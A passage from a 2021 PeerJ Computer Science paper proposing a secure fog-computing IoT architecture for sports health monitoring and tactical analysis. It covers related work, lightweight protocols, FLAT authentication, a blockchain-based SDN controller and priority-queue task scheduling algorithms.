data. In this way, multivariate problems could be solved. However, this study has been suggested for training situations in sports such as running and cycling. This method is used for health monitoring and determining the direction of the athlete. The proposed model, besides monitoring the health of players in football, helps the technical team by performing tactical analysis during the match. In Kubler et al. (2017), it was shown that the emergency situations obtained from the data in the stadium were transmitted to the health institutions in smart city planning. Similarly, it was mentioned that structures that are safe and can detect attacks can be developed. It was emphasized to offer a better sporting event in the 2022 World Cup. Kubler et al. (2017) presents a framework that enables IoT service stakeholders to freely join, contribute, and benefit from an open IoT ecosystem. In Naha et al. (2018), it was mentioned that fog computing based structures will be used a lot in the future and real time application architectures should be developed. It was emphasized that security mechanisms are also very important in the proposed models. In addition, resource allocation is a critical issue in distributed resources such as fog. It was explained that the simultaneous processes should be planned appropriately in the fog layer. In Habibi et al. (2020), it was emphasized that architectural design, algorithms and technologies are the top three research subjects. Each of these three aspects can be applied in a number of subject areas that are divided into six major categories: computing paradigm, application, software, networking, computing resource management and security. In Niu et al. (2019), a task assignment algorithm was proposed for edge calculation. It was emphasized that complexity is difficult to calculate in heuristic approaches, so these approaches should be developed. In Iqbal et al. (2020), a task offloading algorithm was proposed. It was explained that the proposed framework can be improved by adding verification mechanisms with blockchain structures. In Wazid et al. (2020), the importance of using blockchain-based cloud or fog for a safe health system was emphasized. There are also health monitoring studies applied in hospitals, sports fields or other fields. In Ikram, Alshehri & Hussain (2015), the system that detects conditions such as disability of players and sends them to the coach was recommended. Machine to Machine (M2M) standard was used in this system. Also, there were three layers: the detection layer consisting of Wireless Body Area Networks (WBAN), the network layer using ZigBee technology and the cloud layer using cloud services to control all data. Another health monitoring system that uses fog computing was recommended for hospitals in Paul et al. (2018). In this model, data detected using Wireless Sensor Network (WSN) and WBAN were transmitted to the fog layer. In the fog layer, the data was prioritized and the tasks are distributed appropriately to the fog nodes. Thus, more important transactions were given priority. Fog computing has some security advantages. However, security operations between the fog and the cloud were provided using the key pair. It was emphasized that the model is partially implemented due to obstacles such as non-existent Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 3/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ software and complexity of existing software (Paul et al., 2018). In Soni, Pal & Islam (2019), a three-factor mutual authentication scheme was proposed in WSNs for the security of health systems. It provided mutual authentication between a user and the sensor node that is a trusted authority. Software Defined Network (SDN) and Network Function Virtualization (NFV) based structures were used to establish, secure, scale, increase efficiency and reduce the cost of the fog network (Krishnan, Duttagupta & Achuthan, 2020). SDN covered software-based technologies, models and protocols that make the global network smarter, more abstract and functional. NFV included high-volume structures developed to virtualize network functions and increase network integration. The task of the fog network was to connect each component of the fog layer. It was difficult to manage these networks and achieve sustainable connectivity. SDN and NFV techniques were used for operations that increase the efficiency of the system such as easy management and scalability (Yi, Li & Li, 2015). Each fog node could communicate multi-hop (node-to-node). Therefore, each node served as a router in the fog network. SDN was used for efficient routing optimization in the fog platform. Hierarchical SDN-based fog architecture studies were carried out on the IoT platform in order to enable effective routing of fog nodes (Okay & Ozdemir, 2018). NFV separated software from hardware with virtualization to make network functions faster. NFV-based hybrid (cloud and fog) systems were developed to minimize the cost of the network (Mouradian et al., 2019). In Madsen et al. (2013), important measurements were made for the service quality of the fog network. These were connectivity, reliability, capacity and latency measurements. The network was expected to be fast and reliable in connectivity measurement. In reliability measurement, it was expected that the data will be transmitted accurately and completely. However, for this, some control operations were applied to the data. This brought additional costs to the system as a delay. In capacity measurement, the network was expected to use bandwidth and storage areas efficiently. Therefore, the data was collected, then the computing was made. Thus, the cache could be redesigned for other processes (Wang et al., 2014). This process caused delay. In the delay measurement, the nodes were expected to receive a rapid response from the computing and storage processes. With the techniques such as flow mining and complex event processing, delays could be reduced by predicting future operations. Interface and programing models were required for IoT developers to move their applications to the fog computing platform. Dynamic, hierarchical resources were needed to optimize based on these models for components to adapt to these platforms (Yi, Li & Li, 2015). End nodes could be mobile in IoT applications. Mobile end nodes created challenges in resource management because bandwidth, storage, computing, delay situations change dynamically. Resource management and sharing studies were carried out that properly share heterogeneous resources such as CPU, bandwidth, storage, in the fog layer (Liu et al., 2014). The task scheduling model was recommended for IoT applications in the cloud (Basu et al., 2018). A hybrid system has been designed by using the genetic algorithm and the ant colony algorithm together. It was emphasized that the performance increased depending on the Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 4/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ number of processors. It was aimed to reduce the processing time of the tasks in the processors rather than the assignment of the tasks to the processors. In Kuang et al. (2019), a two-level alternation method framework based on Lagrangian dual decomposition was proposed at the lower and upper levels to solve the problems of offloading and resource allocation in MEC systems. In Zhu et al. (2018), a deadline sensitive MEC system with mobile devices sharing multiple heterogeneous MEC servers and formulating a minimum energy consumption problem was proposed. In Alameddine et al. (2019), a new thoughtful decomposition based on the Logic Based Benders Decomposition technique was designed for the resource allocation problem. In Rahbari & Nickray (2019), the importance of resource allocation and task scheduling in fog-based applications was emphasized. A greedy knapsack-based scheduling algorithm has been proposed to properly allocate resources to modules in the fog network. Algorithm simulated with iFogSim. In Heydari, Rahbari & Nickray (2019), it was mentioned that resource management is an NP-hard problem to reduce energy consumption in the cloud. Fog scheduling structures using the Bayesian classification scheduling method were examined. The method was simulated using the iFogSim program and was said to reduce energy consumption and costs in the cloud. In Fang et al. (2018), time sharing optimization of communication and computing resources was discussed in order to minimize the total energy consumption of mobile devices in a Mobile Edge Computing (MEC) system.An algorithm based on the alternating direction method of multipliers was proposed for energy consumption in MEC systems. It was emphasized that these models are simulated and their performance is high. Motivation and Contribution In this article, secure IoT model is proposed to monitor the health of players and spectators, and tactical analysis in the match. In the proposed model, the system becomes more efficient with the help of fog computing. In addition to some security situations of fog computing, there are important features to be achieved such as privacy, confidentiality, authentication, detection of attacks and bandwidth saving, which makes the system safe and fast. Thus, their health is monitored by protecting the privacy of players and spectators from third parties. In tactical analysis, two teams are isolated from each other by authentication methods. In the transmission of both requests/ responses sent to end devices, fog computing is faster than cloud computing. Also, important processes are processed faster and the delay is effectively reduced with the priority based queue method in fog nodes. Thus, the requests with high priority are processed with low latency. In processes that require high processing capacity such as authentication and privacy in the proposed system, bandwidth is saved thanks to implicit certificates. Malicious changes are noticed with block chain based SDN controller. Data loss is prevented and data integrity is ensured during flooding attack. Data stored permanently is encrypted when it is sent from the fog nodes to the cloud. In this article, security problems faced by fog computing systems are also discussed. The measures of our model against these problems are explained. There is also an analysis of our model in terms of safety and effectiveness. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 5/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ The difference from the similar work in Ikram, Alshehri & Hussain (2015) and Soni, Pal & Islam (2019) is that the fog model is used in the proposed model. Thus, responses with low latency are produced. A task management algorithm different from the work in Paul et al. (2018) is proposed in fog nodes. In the proposed model based on priority queue and node list, it is aimed to make priority processes with low latency. Also, another difference of the proposed model from these studies is the processing of tactical analysis cases as well as the health system. In Horton et al. (2015) and Taki & Hasegawa (2000) included tactical analysis approaches or reviews. No studies on health systems have been conducted. In Baca & Kornfeind (2006) and Pfisterer et al. (2006) were non real time models. In these studies, fog computing was not used and task management mechanism was not recommended. There is no detailed security proof. The proposed model is real-time and includes blockchain-based and lightweight plugins for security principles such as authentication, privacy, integrity. Analysis of the model is also included in this article. In addition, in the proposed model, light protocols are used for communication and security. And so the processing load on low power devices is reduced. Organization In this article, fog computing and IoT based lightweight and safe model are recommended for tactical analysis and health monitoring in sports. In addition, research is made on the features and security principles of the fog computing platform. The following sections of the article include: Features and security needs of fog computing in “Proposed Model”, the details of the proposed model in “Analysis of the Proposed Model”, the security and effectiveness analysis of the proposed model in “Simulation of the Proposed Model”, challenges of wearable technology studies and suggestions for future studies in “Challenges in Wearable Technologies and Future Works” and conclusion in the last section. FOG COMPUTING FEATURES AND SECURITY NEEDS This section contains features and security needs of fog computing. It includes the security concept of fog computing and IoT protocols used in the proposed model. Fog computing is a localized and virtualized platform that provides services such as data processing and storage between end devices and cloud data centers (Bonomi et al., 2012). IoT becomes more efficient and more secure with fog computing (Abdulkareem et al., 2019). Sensors with restricted resources are used in the IoT applications. Processes that require large computing such as data processing, storage, and encryption are not usually done by sensors. Therefore, there must be a structure that performs these processes. Generally, cloud nodes serving as remote servers or fog nodes serving locally are used. Fog computing is used to process, store and protect data from sensors without being sent to the cloud. The unsecured Internet network is used when sending data to the cloud. If IoT devices send the detected data to the cloud, it carries risks such as stealing and modifying the data. In addition, it takes a lot of time to process and store the data. The delay time increases for the response to end devices. Since data is processed locally when using fog computing, latency is reduced for response to end devices. Also, if the data Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 6/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ needs to be sent to the cloud, the data is protected with encryption. It is important to use fog computing in IoT applications to increase the performance of the system. A large amount of data is obtained in IoT applications. To transfer the data to the cloud, it requires high bandwidth. Therefore, analyzing the data in the fog layer and sending only the data to be stored permanently to the cloud reduces the bandwidth (Cisco, 2015). Three-layer architecture is commonly used for fog computing. The first layer consists of end devices such as sensor nodes, smart devices, IoT supported devices. The second layer consists of fog nodes such as router, gateway, switch, access points. The fog nodes carry out storage and information processing activities. The third layer consists of remote cloud servers. It provides sufficient storage and information processing services (Mukherjee et al., 2017). The data obtained from the end devices (sensors) having the restricted source in the first layer are processed by the fog nodes in the second layer. Then, this data is sent either to the cloud in the third layer or to other end devices (smartphone, etc.) in the first layer. Thus, latency is reduced and data to the cloud is preserved. Important advantages of fog computing (Bonomi et al., 2012): Low latency, preprocessing of data to the cloud for permanent storage, and so saving bandwidth, data processing without connecting to the Internet, compatible with many sensor nodes, real-time applications can be produced, and sufficient resources for data processing and calculation. Due to these advantages, fog computing is used in the tactical analysis and health monitoring model we proposed. Security requirements for fog computing in IoT applications Although fog computing provides some security capabilities to IoT systems, it has security and privacy needs against potential threats. The data detected in the end nodes must be protected when transferring between devices. Fog computing is an important interlayer between the cloud and the user to reduce latency and protect data. However, the fog is exposed to some threats due to wireless transmission. There are security principles and protocols for this. Security concepts of fog computing The security needs in fog computing and the methods used for these needs in the proposed model can be listed as follows (Mukherjee et al., 2017; Alrawais et al., 2017; Roman, Lopez & Mambo, 2018): � Authentication: Resource-restricted IoT devices cannot perform the encryption required for authentication. For this, it provides the costly storage and data processing needs from outside sources such as fog nodes. Users and nodes authenticate in the fog network to get service. Authentication is provided in the proposed model with the FLAT method. � Confidentiality: Data must be secured during transmission from the IoT node to the fog node or from the fog node to the cloud. For secure communication, the IoT device communicates with any fog node in the fog network when it needs data processing and storage. Since the resources of the end nodes are restricted, lightweight structures are Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 7/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ used to secure this communication. Therefore, FLAT method is preferred in the proposed model. In the FLAT model, fog nodes make all processes that require high computation for security. � Malicious and Unauthorized Nodes Prevention: A malicious node in the IoT environment leads to the capture, misdirection and replacement of data. When devices on the network cannot mutually verify each other, the attacker can initiate attacks such as Rogue Gateway, DoS (Denial of Service) and DDoS (Distributed DoS) by continuously sending requests to the fog node. Access to the nodes is limited to protect them from malicious nodes. In the proposed model, authentication is provided by FLAT method. In addition, data integrity is checked with blockchain based SDN structure. � Data Integrity: In attacks such as Man-In-The-Middle (MITM), which can occur in fog nodes, data corruption must be perceived by fog because the data must be transmitted to the target node without any disruption. If not transmitted, the fog nodes must perform the predefined processes. In the proposed model, blockchain based SDN controller method is proposed for data integrity. � Accessibility: It defines that users can always get service from sources of fog nodes. DoS and DDoS are some of the attacks that prevent accessibility. These attacks should be prevented. � Heterogeneity: Data obtained from a large number of devices with different characteristics must be transmitted to the fog nodes. Computing and data processing costs increase due to different communication needs. In the proposed model, devices with different features can communicate wirelessly over the ZigBee network because they support 802.15.x protocols. � Computing Cost: Fog interlayer is used to reduce latency in IoT applications. The fog layer needs computing capacity for processing and storing data, generating real-time responses, encryption, etc. These tasks are difficult to perform on resource-constrained devices. In the proposed model, high computing processes are made in fog nodes. Thus, the accessibility of the system is maintained. Overview of IoT protocols In the IoT systems, different lightweight protocols are used together with the TCP/IP protocol set. These protocols provide effective communication for resource-constrained structures. In this section discusses the lightweight protocols used in the proposed model. � The Constrained Application Protocol (CoAP): It is a web transport protocol that is specialized for use in low power and loss networks with restricted nodes (Shelby, Hartke & Bormann, 2014). It is defined in RFC 7252. It can work with low power and limited devices up to 10 KiB data size and 100 KiB code size (Bormann, Ersue & Keranen, 2014). CoAP is implemented on UDP by default for minimum resource usage. CoAP has a header structure of 4 Bytes (optionally 4*4 B) (Shelby, Hartke & Bormann, 2014). CoAP consists of 4 layers. It provides low power multicast support. Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 8/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ It can easily interact with HTTP. In the proposed model, CoAP is used in the communication management of fog nodes and end devices. � ZigBee protocol: ZigBee is an open and global standard used for wireless personal area networks in low power applications. It can transmit 250 Kbit/s at distances up to 100 meters indoors and over 300 meters outdoors. ZigBee uses the AES-128 structure in its standard security mechanism (Li, Jia & Xue, 2010). In the proposed model, the data obtained from the sensors are transmitted by ZigBee networks due to reasons such as the width of the coverage area in the outdoor, low power and supporting a large number of IoT nodes. PROPOSED MODEL This section contains overview of the proposed model. It includes task management in the fog nodes, security details. An IoT model is proposed on health and tactical analysis monitoring in sports using fog computing. Appropriate sensors are placed as a wearable technology for players and spectators. Thanks to the data obtained from these sensors, health conditions are monitored and team-based tactical analysis is performed. In addition, environmental factors (temperature, humidity, ball position etc.) are collected from the sensors. The data obtained from the sensors are transmitted locally and wirelessly to the fog nodes in the ZigBee network. The data is processed in fog nodes and results are sent to the club doctor and the technical team. Since there is a local network, data is transmitted more safely and quickly. The data flow and ZigBee structure of the proposed model are shown in Fig. 1. Details of the proposed model In the proposed model, data is collected from players or spectators in the sports competition. Since the received health data is huge and responses with low latency are required, processing and storing of the data should be done quickly. Also, the data obtained from the ball and players are processed with low latency and position analysis should be done. For this reason, fog computing is used in the proposed model. Also, if there is data to be stored permanently in the cloud system, the data can be encrypted when it is sent to the cloud via the internet. Sensors such as body temperature, pulse, distance and motion, sensitive position, ECG are placed in players. These sensors are found on the player’s clothing or directly on their body, such as wristbands and body bands. In this way, WBAN are created. In addition, health problems that require first aid that can occur in the spectator are monitored. Therefore, it is assumed that this WBANs are designed for the spectator as well as the players. These products are difficult to provide as wearable technology is still developing. Therefore, wearable technologies are not included in the scope of this article. In this article, a safe fog-based infrastructure is proposed for health and tactical analysis in the field of sports. Data flow in Fig. 2: the data obtained from players or spectators with WBAN are transmitted to fog servers; then the results of the data processed in the fog servers are transmitted to the devices of the technical team and club doctors. The local operation of Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 9/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ the system reduces latency in data processing and transmission. This helps early treatment if players or spectators are injured. In addition, according to the analysis, it provides the technical team to apply tactical changes early. In order to protect the position and tactical data between the two teams, the nodes of each team must authenticate. Data communication of end node devices performing sensing and monitoring is shown in Fig. 3. Federated Lightweight Authentication of Things (FLAT) is used for secure data communication and nodes to recognize each other. In security operations, bandwidth is reduced by using Implicit Certificates. ZigBee network is used to transmit the data Figure 1 The data flow and ZigBee structure of the proposed model. Full-size DOI: 10.7717/peerj-cs.342/fig-1 Figure 2 Sensors and their possible locations in system actors. Full-size DOI: 10.7717/peerj-cs.342/fig-2 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 10/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-1 http://dx.doi.org/10.7717/peerj-cs.342/fig-2 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ obtained from the sensors to the fog nodes. The ZigBee network has its own security methods. In addition, block chain based SDN controller mechanism is used for recording transactions and checking data integrity. Traditionally, in IoT applications that use only cloud, data is sent either without encryption or with encryption on resource-restricted end nodes. This causes either the data to be stolen or the end device to use its resources inefficiently. In the proposed model, security and efficient usage of resources are provided since the detected data is encrypted in the fog nodes and sent to the cloud. In addition, all operations with high computing power in the security phase are performed in the fog nodes. Therefore, the proposed model is lightweight and efficient. The layers of the proposed model are given in Fig. 4. � The perception and end node layer consists of sensors used for collecting data and user end devices. � In the middle layer, a network is required to transmit the data to the fog layer. This network is local and uses the ZigBee protocol, which allows large amount of devices to communicate. � In the fog layer, data processing and storage are performed by fog nodes. After the data is processed, it is sent to the perception and end node layer or to the cloud layer for permanent storage. Data sent to the cloud layer is encrypted in the fog layer due to the insecure internet. � The network layer includes the internet connection between the fog and the cloud layer. This layer exchanges data between the cloud and fog layers. � The cloud layer carries out the permanent storage and processing of data. The data obtained from the sensor and end node layer are sent to the fog nodes in the fog layer via ZigBee networks in the middle layer. It is processed in fog nodes after passing through task management processes. There are two cases after the results are obtained. The first case is that the results are sent to the cloud layer via the internet in the network Figure 3 Data communication of end node devices performing sensing and monitoring. Full-size DOI: 10.7717/peerj-cs.342/fig-3 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 11/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-3 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ layer for permanent storage. The second case is that the results are sent to the sensor and end node layer user devices via ZigBee in the middle layer to inform system actors. Devices in the sensor and end node layer are in the same layer as they are located in the same area. Sensors collect data, while end devices report the result to system actors. Task management in the fog nodes Fog nodes perform data processing and storage within the local network. The structure of a fog node is shown in Fig. 5. IoT systems can generate data frequently and periodically. This data is stored in a compressed form in the Data Storage. A timestamp is used to determine which IoT device the data comes from and when. The Communication Management transfers the results it receives from the Data Distribution Service to the IoT devices through the CoAP protocol (Yoon et al., 2019). The Security Management carries out both security of fog and encryption of data to be sent to the cloud. The Distributed Figure 4 The layers of the proposed model. Full-size DOI: 10.7717/peerj-cs.342/fig-4 Figure 5 The structure of a fog node. Full-size DOI: 10.7717/peerj-cs.342/fig-5 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 12/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-4 http://dx.doi.org/10.7717/peerj-cs.342/fig-5 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Management provides management of data computing processes. The Application Management provides management of the applications used in the fog. The SDN Controller performs control and data integrity processes within the distributed blockchain- based architecture. Details of the blockchain based SDN structure used to verify the data and especially prevent flooding attacks are examined in the “Security of the Proposed Model”. In the proposed health and tactical analysis monitoring model, data is exchanged between end nodes, fog and cloud. The tasks that take place in the fog and cloud nodes are shown in Fig. 6. Figure 6 shows the main tasks in the fog and cloud, and the path to raw data and result data. These collected data by sensors are sent to the fog layer. After processing in the fog layer, the results are either to the devices of technical team or to the cloud after being encrypted for permanent storage. In Fig. 7, tasks in fog nodes correspond to data preprocessing and validation (v1), data analysis and classification (v2), computing of health data (v3), computing tactical analysis data such as possible pass combinations and quality pass analysis thanks to Voronoi graph and Delaunay triangulation (v4), encryption and decryption processes for data to and from the cloud (v5), preparation of data to end nodes (v6), preparation of data to the cloud (v7). Each eij stands for the relationships and data flow between the i and j tasks. Graph covers the processes of classifying, analyzing and sending the results to the end devices or the cloud after the data is perceived. The fog node structure is given in Fig. 5, it has management and storage areas that perform these operations. Apart from these, there are also fog servers that act as authentication and identity providers. Figure 6 Overview of tasks in the fog and cloud. Full-size DOI: 10.7717/peerj-cs.342/fig-6 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 13/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-6 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ IoT devices generate a lot of data for real-time processing with low latency tolerance. Therefore, task management algorithms are used in fog nodes. The proposed model uses a priority queue based on task management algorithm. The operations in Fig. 7 show the priority assignment step of this algorithm (Choudhari, Moh & Moh, 2018). Requests from the end devices arrive at the nearest fog node. There are three queues in the fog node: high (QH), medium (QM) and low (QL). Each request (i), is assigned to these queues according to the original priority level of the request (SBCAT) and whether the request delay time (or total service time) (delayTi ) is between the two thresholds (T1 and T2). This process is made with the priority assignment algorithm. In the fog nodes, the request delay time (delayTi ) of a node request is equal to the difference of the deadline time given by the request and the arrival time to the fog node. The total time (Wi) for a request in the fog layer is equal to the sum of the request’s wait time in the queue and the processing time of the request. Thus, in accordance with the Service Level Agreement (SLA) used in the algorithm, the request (i) must be Wi < delay T i to supply the Quality of Service (QoS) requirement. According to the Algorithm 1 (Choudhari, Moh & Moh, 2018); a request (i) is assigned the highest priority queue (QH) if the total service time (delay T i ) of the request from the node is less than or equal to the estimated service time (STiest) of the request (i). Otherwise, it is checked whether the total service time of the request is between the threshold values of T1 and T2. If it is within this range, the original priority level of the request (SBCAT) is checked. Accordingly, the request is assigned to the queue QH or QM or QL. Finally, if the delay T i value is greater than T2, the requests are forced to be assigned to the queue that matches their original priorities. If the queues are full, they are assigned to a low level queue. Thus, higher priority and shorter processes are allowed to be executed. According to the Algorithm 2, the management of fog nodes consists of two steps. In Step 1, Each request (reqi) is sent to the fog node (nodedt). nodedt distributes tasks to other fog nodes. Each node estimates the total service time from the amount of unused resources. The estimated total service time of node k (STkest) is sent to nodedt. This value is kept in ascending sorted list (Lnode) in the nodedt. The list is constantly updated. Each reqi is placed in queues according to the Algorithm 1. In Step 2, Requests in all queues Figure 7 Graph of tasks in fog nodes. Full-size DOI: 10.7717/peerj-cs.342/fig-7 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 14/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-7 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ are processed in the order of QH, QM, QL. In the Lnode list in the nodedt, the request (reqi) is assigned to nodek when the total service time (ST k est) of the nodek is equal to or greater than the (delayTi ) of the reqi. The loop is broken and the next request is handled. If the reqi is not assigned to any fog node, the Lnode is reversed and looped again. If the total time (sum) is greater than or equal to delayTi , the reqi is assigned to the group of nodes, and the loop is broken and the next request is handled. Otherwise, each value in Lnode until that time is summed. Lnode(first) is equal to the ST last est value before the list is reversed. If the reqi is not assigned to the group of nodes, the fog layer cannot supply with the request. In this case, the queue with the request is based. If the request is in QH or QM queues, it is rejected. If the request is in the QL queue, it can be sent to the cloud because the transmission of data to the cloud increases latency. The parameters and definitions of Algorithm 2 are shown in Table 1. Equation 1 is used to determine the nodes that supply the reqi request and the limit for the nodes supplying the reqi. Algorithm 1 Priority assignment algorithm. Priority(delayTi , ST k est) if delayTi ≤ ST k est then return (H) else if T1 < delay T i ≤ T2 then if SBCAT = 1 then return (H) else if SBCAT = 2 then return (M) else if SBCAT = 3 then return (L) else if delayTi > T2 then if SBCAT = 1 then if QH is not full then return (H) else return (M) else if SBCAT = 2 then if QM is not full then return (M) else return (L) else if SBCAT = 3 then return (L) Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 15/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ Linode � Xn k¼1 Lknode; n � sizeðLnodeÞ; Linode � delayTi (1) The total capacity of the resources is determined according to Eq. (2) for each request (LUnode, indicates the updated capacity, while L C node indicates the current capacity). Algorithm 2 Management of fog nodes. Step 1 Each fog node sends the STkest (for node k) to nodedt nodedt assigns each ST k est to the ordered Lnode list. foreach reqi do reqi is sent to nodedt (Pri) = Priority(delay T i , ST T est) if Pri = H then QHðlastÞ reqi else if Pri = M then QMðlastÞ reqi else if Pri = L then QLðlastÞ reqi Step 2 /* Task distribution to fog nodes according to STkest and delay T i */ foreach reqi in QH, QM, QL do for Lnode(k) do if STkest � delayTi then nodek reqi break if reqi is not assigned to any fog node then reversedList reverseðLnodeðkÞÞ /* from high to low (processing capacity) */ sum LnodeðfirstÞ for reversedList do if sum � delayTi then LnodeðfirstÞ; LnodeðsecondÞ; …; LnodeðkÞ reqi break else sum sum þLnodeðnextÞ if reqi is not assigned to any fog node group then if (reqi in QH) or (reqi in QM) then reject(reqi) else if reqi in QL then cloud reqi Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 16/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ LUnode ¼ LCnode �Linode (2) After each request is finished, the total capacity of resources is updated according to Eq. (3). LUnode ¼ LCnode þLinode (3) In the Big-O complexity analysis for the Algorithm 1, delayTi and ST i est values are assumed to be calculated. Each request takes place in the complexity of O(1). The total complexity for n requests is O(n). In the Big-O complexity analysis for the Algorithm 2, Step 1 has the O(n) complexity for n requests because it uses the Algorithm 1. In Step 2, the number of requests in each queue to be processed is n, the number of fog nodes is m. The worst case is that the request is not assigned to any fog node. In this case, the worst complexity of Step 2 is n · m + m + 6. The complexity of Step 1 and Step 2 together is n + n · m + m + 6. The complexity of the Algorithm 2 according to Big-O notation is O(n · m). Security of the proposed model Perceived data is circulated a large number of nodes, such as processing in fog nodes, being sent back to end nodes, and stored in the cloud via the internet. Close-distance ZigBee networks have security mechanisms such as the AES-128 encryption method, and the renewal of keys in short periods (Li, Jia & Xue, 2010). In addition, authentication, data privacy and integrity must be ensured and data must be transmitted encrypted on the internet. Therefore, the implicit certificate-based FLAT method is used for authentication and data privacy in the proposed model (Santos et al., 2020). Data integrity is ensured and flooding attacks are detected with block chain based SDN controller. Secure communication between fog and cloud is performed by public key cryptography. In the proposed model, the FLAT method is used for authentication between IoT sensors and fog nodes. Only the data of legal sensors are taken into fog nodes. If an attacking node successfully passes the FLAT authentication stage in any way, the data passes through the SDN controller. In this way, a warning is received in unreliable situations. The SDN controller does not warn in reliable situations. The security of the Table 1 Parameters for the proposed algorithm (Algorithm 2). Parameters Definitions QH; QM; QL Priority queues reqi Request delayTi Delay cost for i request STTest Estimated total capacity of requests in queue STkest Estimated service capacity of node k nodedt Distributor node Lnode Capacity list of ordered nodes Lknode k.Element of the node list nodek k.Node Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 17/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ proposed model is provided in these two stages. However, in this article, the proposed task management algorithm is simulated. Data privacy and authentication Federated Lightweight Authentication of Things is used in the proposed model for authentication and privacy. FLAT is the adaptation of Federated Identity Management (FIdM), the cloud authentication system, to fog computing (Santos et al., 2020). FIdM performs authentication and encryption processes at high cost. FIdM can be used to provide security between cloud and fog. However, authentication and encryption can be done with FLAT on resource-restricted devices. Therefore, FLAT protocol is used in the proposed model. The FLAT protocol consists of low computing client, high computing service and identity provider devices. Clients are resource-constrained sensor devices and user devices. The Service Provider (SP) is the fog server. The Identity Provider (IdP), on the other hand, is a server that should work uninterruptedly in the fog network. For the FLAT protocol, the symmetric key must be preinstalled on the end devices. These keys are created with Physical Unclonable Functions (PUF) to be resistant to physical attacks. After the PUF output is produced, it is formatted and stored. Formatted PUF outputs are used to provide trust between end nodes and IdP. Trust between IdP and SP is provided by digital certificates given by a common certification provider. According to Fig. 8 (Santos et al., 2020); when the resource-constrained client device wants to access the service, it requests a session key from the IdP (in 1). IdP transmits the session key to the client (in 2). IdP sends its certificate to SP; The SP sends its certificate to IdP (in 3, 4 and 5). After a secure communication channel has been created, IdP Figure 8 The FLAT system. Full-size DOI: 10.7717/peerj-cs.342/fig-8 Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 18/34 http://dx.doi.org/10.7717/peerj-cs.342/fig-8 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ sends the client key to the SP. As with the FIdM system, the client requests a confirmation from IdP and receives approval (in 6 and 7). The client requests service by presenting this confirmation package to SP (in 8). SP provides service if the confirmation package is correct (in 9). So the identity is verified and the SP starts the service. Each sensor placed on players and the sports field must establish a secure session with fog nodes before sending data to fog nodes. For this reason, the FLAT authentication system is used in the model. The FLAT system offers a lightweight system for authenticating with resource constrained sensors. The communication of the sensors in the sports field, the identity provider and the service provider on the FLAT system is shown in Fig. 8. After this process, the task management process starts. In the FLAT system, both the client and SP must rely on IdP. Communication between IdP and SP takes place using asymmetric key cryptography, while IdP-client and SP-client communications take place using symmetric key cryptography. Therefore, the FLAT protocol is more efficient for IoT systems using fog computing. To increase the security of the system against attacks (Soni, Pal & Islam, 2019) authentication method can be used between a user and a node that is a trusted authority. The FLAT method uses Message Authentication Codes (MACs) and digital signature for authentication, symmetric and asymmetric encryption for confidentiality, MACs, digital signature and PUFs for integrity, authentication of two parties for availability, and the FIdM model that limits access to identity for privacy (Santos et al., 2020). Security with blockchain based SDN controller Blockchain is a storage technology that serves as a registry, allowing the transactions performed in the system to be tracked by each node (Nofer et al., 2017). A blockchain consists of a chain of data packets (blocks) and is expanded with the new block added. Therefore, it represents a logbook. Fog nodes with blockchain based SDN controllers are used in the fog layer of the proposed model. The structure of the blockchain based SDN controller is shown in Fig. 9 (Sharma, Chen & Park, 2017). This structure is the SDN controller part in the fog node shown in Fig. 5. Communication between end devices and fog nodes takes place with the ZigBee controller. The ZigBee controller is considered a gateway or routing switch for the SDN controller in the fog node. The SDN controller structure consists of three steps (Sharma, Chen & Park, 2017). � Step 1: The Packet Parser carries out tracking and parsing operations to identify basic messages from arrived packets. Each packet must be captured and parsed to identify abnormal situations. The package parsing phase consists of four messages, Features_Reply, Stats_Reply, Flow_Mod and Packet_In. The attacker should capture a subset of these messages to change the network structure of the SDN controller. The packet parser dynamically tracks arrived packets to extract metadata. � Step 2: The Flow Topology Graph 